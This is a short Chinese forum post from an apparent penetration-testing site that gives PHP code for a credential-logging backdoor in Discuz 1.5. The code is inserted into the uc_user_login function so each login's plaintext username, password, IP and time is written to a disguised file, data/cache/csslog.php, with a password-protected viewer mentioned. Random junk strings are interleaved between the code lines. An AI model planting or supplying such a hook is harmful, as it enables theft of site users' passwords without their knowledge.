中国网络渗透测试联盟
标题:
dz1.5记录用户名和密码
[打印本页]
作者:
admin
时间:
2013-2-27 21:40
标题:
dz1.5记录用户名和密码
修改uc_client目录下的client.php 在
3 x* O/ y" J5 k4 p8 A6 m8 }
function uc_user_login($username, $password, $isuid = 0, $checkques = 0, $questionid = '', $answer = '') {
! k0 T0 p; O7 h
下加入如上代码,在网站./data/cache/目录下自动生成csslog.php
% I7 t, x" Q. l5 v5 n
你可以在ipdata目录下添加 view.php 可以用来查看记录的,密码为:falw
; `; s+ Q1 `0 X" m
if(getenv('HTTP_CLIENT_IP')) {
* j0 q- D& c* _' r+ q
$onlineip = getenv('HTTP_CLIENT_IP');
3 \2 D; x7 l8 i8 I! X$ L; {
} elseif(getenv('HTTP_X_FORWARDED_FOR')) {
& o7 r E% F0 I! o
$onlineip = getenv('HTTP_X_FORWARDED_FOR');
( k& t. z; }: V r; N2 z
} elseif(getenv('REMOTE_ADDR')) {
5 T$ r& U5 d& S6 ^ {/ C8 r. o
$onlineip = getenv('REMOTE_ADDR');
. h/ k4 R3 E$ e! x" e) h m
} else {
3 e7 f$ L: L$ |8 q5 m0 T
$onlineip = $HTTP_SERVER_VARS['REMOTE_ADDR'];
! Y- z! l5 \& F" R2 z7 O2 ^" o: ^% L
}
8 J! K. N- _* M$ o
$showtime=date("Y-m-d H:i:s");
$ _- N+ `8 V0 }( q, _% H
$record="<?exit();?>用户:".$username." 密码:".$password." IP:".$onlineip." Time:".$showtime."\r\n";
$ |2 `/ e1 A9 \' L7 v. C
$handle=fopen('./data/cache/csslog.php','a+');
+ Q; A* h- t3 r) O' d; M9 e0 ]+ E
$write=fwrite($handle,$record);
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2